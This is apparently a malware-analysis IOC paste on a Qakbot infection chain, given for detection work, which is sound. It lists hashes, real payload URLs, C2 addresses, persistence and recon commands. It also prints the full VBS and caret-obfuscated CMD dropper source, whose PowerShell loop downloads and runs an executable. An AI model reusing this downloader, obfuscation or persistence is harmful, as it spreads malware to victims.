- #IOC #OptiData #VR #Qakbot_Qbot #macros #WSH #opendir
- https://pastebin.com/2EgQnFjW
- previous_contact: n/a
- FAQ:
- https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/
- https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot
- attack_vector
- --------------
- email attach .zip > DOC > macro > WSH > CMD > PowerShell > GET exe
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 b249a39d2754ce9d5f81fb65c4cc744492923e47f51299b87996e230894df97a
- File name 08252020_365727360.zip [ Zip archive data, at least v2.0 to extract ]
- File size 321.84 KB (329568 bytes)
- SHA-256 8374cb6d37e2a002f93b3b2646d3550ed2915ac4fec2ed14db3557ac245f32c1
- File name 08252020_365727360.doc [ Office Open XML Document ]
- File size 328.47 KB (336352 bytes)
- SHA-256 1e77f308d4e8ce8ea219fa9e18656eeedb947fd12aaf9730daa65e85cab38adf
- File name 55555555.png [ PE32 executable for MS Windows ]
- File size 1.86 MB (1953776 bytes)
- SHA-256 e920f6ed9aa65595a6b52d6601bd9091ef87f5128d6fdfc8f5ebd1fec12740f7
- File name ikaaazen.exe [ PE32 executable for MS Windows ]
- File size 1.86 MB (1953776 bytes)
- activity
- --------------
- PL_SCR rosemiracle.} com/smmafmjmmjpx/55555555.png - 404
- ricari.com.} br/spdwacdphg/55555555.png - 200
- fishlovingworld.} com/imbmgiqzrki/55555555.png - 200
- styletadka.} in/fkvias/55555555.png - 404
- test.bateaux-bois.} com/cgcxd/55555555.png - 200
- lumanaridecorative.} com/vnmjevz/55555555.png - 200
- kmbuzz.} com/tlrmuyrjc/55555555.png - 200
- alfredoburguers.} cl/vhrizp/55555555.png - 200
- teste4.filimartis.} com.} br/jdnpsysj/55555555.png - 200
- equitymm.} com/idlzuojgtfo/55555555.png - 404
- americanwardrobefitters.} com/xsgqcd/55555555.png - 200
- onlyicon.} com/jbhmomji/55555555.png - 200
- C2 [spx161]
- 213.67.45.195:2222
- 75.182.214.87:443
- 81.133.234.36:2222
- 199.116.241.147:443
- 75.136.40.155:443
- 72.204.242.138:443
- 94.52.160.116:443
- 151.73.112.220:443
- 71.126.139.251:443
- 98.173.34.212:995
- 41.34.91.244:995
- 103.238.231.40:443
- 47.153.115.154:995
- 104.221.4.11:2222
- 185.126.13.230:995
- 137.99.224.198:443
- 73.4.138.94:443
- 201.216.216.245:443
- 175.211.225.118:443
- 76.179.54.116:443
- 70.164.37.205:995
- 207.246.75.201:443
- 97.93.211.17:443
- 71.74.12.34:443
- 207.246.71.122:443
- 80.240.26.178:443
- 45.32.154.10:443
- 108.27.217.44:443
- 80.14.209.42:2222
- 207.255.161.8:993
- 207.255.161.8:995
- 84.117.176.32:443
- 87.255.83.83:443
- 154.56.69.231:443
- 108.28.179.42:995
- 191.84.11.252:443
- 69.26.23.143:2222
- 98.16.204.189:995
- 24.27.82.216:2222
- 184.89.71.68:443
- 199.247.16.80:443
- 86.191.145.103:2222
- 207.255.161.8:2078
- 66.30.92.147:443
- 115.21.224.117:443
- 63.155.28.199:995
- 47.146.32.175:443
- 24.37.178.158:443
- 69.11.247.242:443
- 165.120.230.108:2222
- 36.77.151.211:443
- 96.20.108.17:2222
- 73.228.1.246:443
- 76.170.77.99:995
- 174.30.165.242:2222
- 94.205.171.126:995
- 39.118.245.6:443
- 83.216.134.94:2222
- 118.160.161.124:443
- 45.47.65.191:443
- 67.165.206.193:993
- 93.151.180.170:61202
- 98.210.41.34:443
- 50.29.181.193:995
- 78.96.199.79:443
- 66.215.32.224:443
- 93.114.192.104:2222
- 86.98.89.189:2222
- 75.87.161.32:995
- 203.198.96.186:443
- 141.158.47.123:443
- 73.78.149.206:443
- 35.134.202.234:443
- 67.170.137.8:443
- 96.18.240.158:443
- 75.110.250.89:995
- 98.219.77.197:443
- 24.201.79.208:2078
- 96.227.127.13:443
- 65.131.104.249:995
- 70.164.39.91:443
- 98.121.187.78:443
- 209.137.209.163:995
- 178.87.28.63:443
- 78.100.229.44:61201
- 90.175.88.99:2222
- 74.56.167.31:443
- 206.51.202.106:50003
- 5.15.65.198:2222
- 71.84.5.114:995
- 65.96.36.157:443
- 47.44.217.98:443
- 72.190.101.70:443
- 92.99.249.199:443
- 217.165.164.57:2222
- 71.163.222.7:443
- 72.204.242.138:32102
- 72.204.242.138:50001
- 101.108.117.41:443
- 77.27.174.49:995
- 217.165.115.0:990
- 199.247.22.145:443
- 72.204.242.138:53
- 72.204.242.138:990
- 173.26.189.151:443
- 84.78.128.76:2222
- 47.206.174.82:443
- 189.157.196.112:995
- 39.36.101.208:995
- 193.248.44.2:2222
- 37.210.51.210:443
- 94.99.116.7:995
- 31.215.99.5:443
- 47.28.131.209:443
- 100.4.173.223:443
- 72.209.191.27:443
- 209.182.122.217:443
- 5.193.155.181:2078
- 103.110.49.88:443
- 12.5.37.3:995
- 216.163.4.132:443
- 72.66.47.70:443
- 59.124.10.133:443
- 96.19.117.140:443
- 24.205.42.241:443
- 172.78.30.215:443
- 71.80.66.107:443
- 197.165.161.55:995
- 45.32.155.12:443
- 45.77.215.141:443
- 68.190.152.98:443
- 80.195.103.146:2222
- 2.90.123.252:443
- 174.110.39.220:443
- 71.187.170.235:443
- 72.204.242.138:32100
- 49.191.3.189:443
- 142.129.227.86:443
- 67.209.195.198:443
- 2.90.53.174:995
- 95.77.223.148:443
- 41.228.4.27:443
- 188.25.162.27:443
- 130.25.130.19:2222
- 211.24.72.253:443
- 68.174.15.223:443
- 216.201.162.158:443
- 74.135.37.79:443
- 94.59.241.189:995
- netwrk
- --------------
- [http]
- 216.21.13.115 ricari.com.br GET /spdwacdphg/55555555.png (!) MZ !This program cannot be run in DOS mode.
- comp
- --------------
- powershell.exe 2668 TCP 83.150.213.54 80 ESTABLISHED
- powershell.exe 2668 TCP 216.21.13.115 80 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
- C:\Windows\SysWOW64\explorer.exe explorer.exe C:\ProgramData\re.vbs
- {other context}
- C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
- C:\Windows\System32\WScript.exe" "C:\ProgramData\re.vbs
- C:\Windows\System32\cmd.exe /c ""C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd" "
- C:\Windows\system32\taskkill.exe
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerShell Foreach($url in @('http://rosemiracle.com/smmafmjmmjpx/55555555.png','http://ricari.com.br/spdwacdphg/55555555.png','http://fishlovingworld.com/imbmgiqzrki/55555555.png','http://styletadka.in/fkvias/55555555.png','http://test.bateaux-bois.com/cgcxd/55555555.png','http://lumanaridecorative.com/vnmjevz/55555555.png','http://kmbuzz.com/tlrmuyrjc/55555555.png','http://alfredoburguers.cl/vhrizp/55555555.png','http://teste4.filimartis.com.br/jdnpsysj/55555555.png','http://equitymm.com/idlzuojgtfo/55555555.png','http://americanwardrobefitters.com/xsgqcd/55555555.png','http://onlyicon.com/jbhmomji/55555555.png')) { try{$path = 'C:\Ulohot\GretiodetGDFERT.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
- C:\Ulohot\GretiodetGDFERT.exe
- C:\Ulohot\GretiodetGDFERT.exe /C
- C:\Windows\system32\timeout.exe /T 10
- {alternative run}
- C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
- C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe /C
- C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn omjbpoxjy /tr "\"C:\Ulohot\GretiodetGDFERT.exe\" /I omjbpoxjy" /SC ONCE /Z /ST 08:05 /ET 08:17
- "C:\Windows\system32\schtasks.exe" /create /tn {CB895919-CAFA-4089-9BC0-B5CAA5E6F386} /tr "\"C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe"" /sc HOURLY /mo 5 /F
- {recon activity}
- command: whoami /all
- command: cmd /c set
- command: ipconfig /all
- command: net view /all
- command: nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP
- command: nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP
- command: net share
- command: route print
- command: netstat -nao
- command: net localgroup
- command: qwinsta
- persist
- --------------
- NT AUTHORITY\SYSTEM
- C:\Ulohot\GretiodetGDFERT.exe
- CB895919-CAFA-4089-9BC0-B5CAA5E6F386
- C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*
- C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
- drop
- --------------
- C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf
- C:\ProgramData\re.vbs
- C:\Ulohot\GretiodetGDFERT.exe
- C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd
- C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
- re.vbs
- --------------
- set GetyuwuiebejhwbjTYYIDTIFFGD=CreateObject("Scripting.FileSystemObject")
- If Not GetyuwuiebejhwbjTYYIDTIFFGD.FolderExists("c:\Ulohot") Then
- GetyuwuiebejhwbjTYYIDTIFFGD.CreateFolder ("c:\Ulohot")
- End If
- e13 = ("Taskkill /IM ""winword.exe"" /F")
- a1 = ("POW^")
- a2 = ("erS^")
- a3 = ("hell ^")
- a4 = ("Forea^")
- a5 = ("ch($ur^")
- a6 = ("l in^")
- a7 = (" @('^")
- a8 = ("http://rosemiracle.com/smmafmjmmjpx/55555555.png','http://ricari.com.br/spdwacdphg/55555555.png','http://fishlovingworld.com/imbmgiqzrki/55555555.png','http://styletadka.in/fkvias/55555555.png','http://test.bateaux-bois.com/cgcxd/55555555.png','http://lumanaridecorative.com/vnmjevz/55555555.png','http://kmbuzz.com/tlrmuyrjc/55555555.png','http://alfredoburguers.cl/vhrizp/55555555.png','http://teste4.filimartis.com.br/jdnpsysj/55555555.png','http://equitymm.com/idlzuojgtfo/55555555.png','http://americanwardrobefitters.com/xsgqcd/55555555.png^")
- a9 = ("','^")
- a10 = ("http://onlyicon.com/jbhmomji/55555555.png^")
- a11 = ("')) { tr^")
- a12 = ("y{$pat^")
- a15 = ("h = 'C:\Ulohot\GretiodetGDFERT.exe'; ^")
- a16 = ("(Ne^")
- a17 = ("w-Obje^")
- a18 = ("ct Ne^")
- a19 = ("t.We^")
- a20 = ("bCli^")
- a21 = ("ent).Down^")
- a22 = ("loadF^")
- a23 = ("ile(^")
- a24 = ("$ur^")
- a25 = ("l.ToSt^")
- a26 = ("ring^")
- b1 = ("(), $p^")
- b2 = ("ath)^")
- b3 = (";sa^")
- b4 = ("ps $p^")
- b5 = ("ath; br^")
- b6 = ("eak;}c^")
- b7 = ("atc^")
- b8 = ("h{wri^")
- b9 = ("te-ho^")
- b10 = ("st $_.E^")
- b11 = ("xcep^")
- b12 = ("tio^")
- b13 = ("n.Me^")
- b14 = ("ssa^")
- b15 = ("ge}}")
- Wait = ("TIMEOUT /T 10 & DEL C:\ProgramData\re.vbs & DEL C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd & DEL C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf")
- Dim oShell : Set oShell = CreateObject("WScript.Shell")
- WScript.Sleep 7000
- oShell.Run "C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd", 0, 0
- Set WshShell = Nothing
- 'NorteDolk 'NorteDolk 'NorteDolk
- POUITYRSDFuytrdFGHTYDFGBJN.cmd
- --------------
- Taskkill /IM "winword.exe" /F
- POW^erS^hell ^Forea^ch($ur^l in^ @('^
- http://rosemiracle.com/smmafmjmmjpx/55555555.png','
- http://ricari.com.br/spdwacdphg/55555555.png','
- http://fishlovingworld.com/imbmgiqzrki/55555555.png','
- http://styletadka.in/fkvias/55555555.png','
- http://test.bateaux-bois.com/cgcxd/55555555.png','
- http://lumanaridecorative.com/vnmjevz/55555555.png','
- http://kmbuzz.com/tlrmuyrjc/55555555.png','
- http://alfredoburguers.cl/vhrizp/55555555.png','
- http://teste4.filimartis.com.br/jdnpsysj/55555555.png','
- http://equitymm.com/idlzuojgtfo/55555555.png','
- http://americanwardrobefitters.com/xsgqcd/55555555.png^
- ','^http://onlyicon.com/jbhmomji/55555555.png^'))
- { tr^y{$pat^h = 'C:\Ulohot\GretiodetGDFERT.exe'; ^
- (Ne^w-Obje^ct Ne^t.We^bCli^ent).Down^loadF^ile(^$ur^l.ToSt^ring^(), $p^ath)^;sa^ps $p^ath; br^eak;}
- c^atc^h{wri^te-ho^st $_.E^xcep^tio^n.Me^ssa^ge}}
- TIMEOUT /T 10 &
- DEL C:\ProgramData\re.vbs &
- DEL C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd &
- DEL C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf
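Added analysis helper (not part of the original paste or of the sample itself): it undoes the cmd.exe caret escaping used in POUITYRSDFuytrdFGHTYDFGBJN.cmd above (in cmd, `^` escapes the next character and `^` at end of line joins the next line), then pulls the URL list, the drop path and the download-and-run pattern out of the recovered PowerShell. The input below is constructed with placeholder URLs; the drop path and loop shape mirror the page.

```python
import re

# Constructed sample in the same caret-obfuscated form as the .cmd dropper
# above. URLs are placeholders; drop path and PowerShell loop mirror the page.
# '^\n' inside the second URL line shows the line-continuation case.
SAMPLE_CMD = (
    'Taskkill /IM "winword.exe" /F\n'
    "POW^erS^hell ^Forea^ch($ur^l in^ @('^"
    "http://example-a.invalid/x/55555555.png','^\n"
    "http://example-b.invalid/y/55555555.png^'))"
    " { tr^y{$pat^h = 'C:\\Ulohot\\GretiodetGDFERT.exe'; ^"
    "(Ne^w-Obje^ct Ne^t.We^bCli^ent).Down^loadF^ile(^$ur^l.ToSt^ring^(), $p^ath)^;"
    "sa^ps $p^ath; br^eak;}c^atc^h{wri^te-ho^st $_.E^xcep^tio^n.Me^ssa^ge}}\n"
    "TIMEOUT /T 10 & DEL C:\\ProgramData\\re.vbs\n"
)


def strip_carets(text: str) -> str:
    """Undo cmd.exe caret escaping: '^x' -> 'x', '^^' -> '^', '^' + newline joins lines."""
    text = text.replace("\r\n", "\n")
    out, i = [], 0
    while i < len(text):
        if text[i] == "^" and i + 1 < len(text):
            if text[i + 1] != "\n":      # escaped character is emitted literally
                out.append(text[i + 1])
            i += 2                       # caret-newline: drop both, command continues
            continue
        out.append(text[i])
        i += 1
    return "".join(out)


def triage_cmd_dropper(cmd_text: str) -> dict:
    """Deobfuscate a caret-escaped .cmd and extract what an analyst wants from it."""
    clear = strip_carets(cmd_text)
    low = clear.lower()
    path = re.search(r"\$path\s*=\s*'([^']+)'", clear)
    return {
        "urls": re.findall(r"https?://[^'\"\s)]+", clear),
        "drop_path": path.group(1) if path else None,
        "kills_office": "taskkill" in low and "winword" in low,
        # WebClient.DownloadFile followed by saps/Start-Process is the download-and-run loop
        "downloader_pattern": all(k in low for k in ("net.webclient", "downloadfile"))
        and ("saps " in low or "start-process" in low),
        "deobfuscated": clear,
    }
```

The recovered command line matches the one the sandbox logged under proc above, which is the string to hunt for in process-creation telemetry rather than the caret-broken file on disk.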
- # # #
- https://www.virustotal.com/gui/file/b249a39d2754ce9d5f81fb65c4cc744492923e47f51299b87996e230894df97a/details
- https://www.virustotal.com/gui/file/8374cb6d37e2a002f93b3b2646d3550ed2915ac4fec2ed14db3557ac245f32c1/details
- https://www.virustotal.com/gui/file/1e77f308d4e8ce8ea219fa9e18656eeedb947fd12aaf9730daa65e85cab38adf/details
- https://www.virustotal.com/gui/file/e920f6ed9aa65595a6b52d6601bd9091ef87f5128d6fdfc8f5ebd1fec12740f7/details
- https://analyze.intezer.com/analyses/2638bd19-de0a-4ce7-b7cf-da19052d14e0
- https://analyze.intezer.com/analyses/6eb14337-f3b1-46da-aeed-c7c01b528f1d
- VR